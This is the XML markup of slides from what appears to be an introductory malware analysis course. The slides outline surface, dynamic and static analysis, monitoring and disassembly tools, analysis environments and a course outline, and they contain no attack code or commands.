          <a:xfrm>
            <a:off x="5400" y="2997360"/>
            <a:ext cx="3774240" cy="3743640"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="227"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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="228" name="Google Shape;375;p33" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="755640" y="1268640"/>
            <a:ext cx="6402600" cy="2016720"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="229" name="CustomShape 2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4736880" y="3429000"/>
            <a:ext cx="4030920" cy="283428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GB" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Success</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>No threats found</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Sample found</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>New threats found</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-171000">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="1800" spc="-1" strike="noStrike" u="sng">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:uFillTx/>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Failure</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Complex obfuscation techniques used</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Lack of time, resources</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285840" indent="-285480">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>
              <a:buChar char="-"/>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="1800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>File sample is not prioritised</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="1800" spc="-1" strike="noStrike">
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="CustomShape 3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6516360" y="2261520"/>
            <a:ext cx="1583640" cy="1399680"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 101169"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="4a7dba"/>
            </a:solidFill>
            <a:round/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="231" name="CustomShape 4"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8100000" y="2984760"/>
            <a:ext cx="360" cy="325440"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="21600" h="21600">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="21600" y="21600"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:noFill/>
          <a:ln w="28440">
            <a:solidFill>
              <a:srgbClr val="4a7dba"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="stealth" w="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="232" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2771640" y="1484640"/>
            <a:ext cx="3600000" cy="359640"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="4a7dba"/>
            </a:solidFill>
            <a:round/>
            <a:tailEnd len="med" type="triangle" w="med"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="0"/>
          <a:fillRef idx="0"/>
          <a:effectRef idx="0"/>
          <a:fontRef idx="minor"/>
        </p:style>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="233" name="CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="2627640" y="1484640"/>
            <a:ext cx="3888000" cy="359640"/>
          </a:xfrm>
          <a:prstGeom prst="arc">
            <a:avLst>
              <a:gd name="adj1" fmla="val 16200000"/>
              <a:gd name="adj2" fmla="val 0"/>
            </a:avLst>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9360">
            <a:solidFill>
              <a:srgbClr val="4a7dba"/>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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="235"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Surface Analysis (Scanning)</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: recognizing or discovering a malware signature (i.e. opening the sample and quickly search for information in the sample file without executing it).</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="743040" indent="-107640">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="561"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="236" name="Google Shape;387;p34" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="655920" y="3285000"/>
            <a:ext cx="8020080" cy="219600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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="238"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Dynamic Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: mainly of running the target sample and gathering diagnostics and behaviour results based on logs and monitoring tools.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="239" name="Google Shape;394;p35" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1907640" y="2565000"/>
            <a:ext cx="5832360" cy="425160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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="241"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Behaviours</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Memory</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> Mainly processes run, with threads. Shows what processes are spawned and with which commands.</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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Disk</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> File and registry accesses and alterations. Shows file and registry read, write, creations and deletes.</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1" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Network</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t> All network traffic.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Required: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Controlled environment.</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Monitoring tools (Wireshark, Process Monitor, FileDump, OllyDbg, etc.)</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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="243" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="97000"/>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Static Analysis</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: examination of the machine code of the binary sample in order to further discover functionality and techniques used by the sample.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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The sample is not executed to monitor behaviour, it is the machine code in the binary file that is examined.</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it may be very time consuming and it may be very complex to perform.</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But static analysis is …. safe.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Tools: </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="30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Disassemblers or Debuggers (IDA Pro / OllyDbg)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1143000" indent="-75960">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="479"/>
              </a:spcBef>
              <a:tabLst>
                <a:tab algn="l" pos="0"/>
              </a:tabLst>
            </a:pPr>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="244" name="Google Shape;407;p37" descr=""/>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId1"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1143360" y="5661360"/>
            <a:ext cx="7801920" cy="86256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Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="246" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="179640" y="1196640"/>
            <a:ext cx="8784720" cy="5112360"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="78000"/>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Tips</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Briefly study a malware before go deeply into it  since most of malwares are complex and huge.</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There is no common approach for analysing of all malwares. </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="28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Different tools &amp; techniques provide different analysis.</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Different scenarios provides generate different analysis results.</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Should do analysis by different ways and tools/techniques.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="24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Both tools/techniques vs. malwares evolution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Analysis Environment</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="248"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Environment</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Real: BootROM, Ghost, etc.</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Virtual: VMWare, VirtualBox, etc.</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>OS</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>: Windows, Linux</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1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Application Platform</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.Net Framework</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Java Runtime Environment (JRE)</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a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2800" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2800" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-151920">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="601"/>
              </a:spcBef>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Course Outline</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="4400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="104" name="TextShape 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="107640" y="1124640"/>
            <a:ext cx="9036000" cy="5733000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="67000"/>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Introduction</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Existence &amp; Motivation</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Types of Malwares (Malicious software)</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Goals of Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="343080" indent="-342720">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="510"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en-GB" sz="3000" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Malware Analysis</a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="3000" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2" marL="1143000" indent="-228240">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="408"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr b="0" lang="en-GB" sz="2400" spc="-1" strike="noStrike">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
              </a:rPr>
              <a:t>Surface </a:t>
            </a:r>
            <a:endParaRPr b="0" lang="en-US" sz="2400" spc="-1" strike="noStrike">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
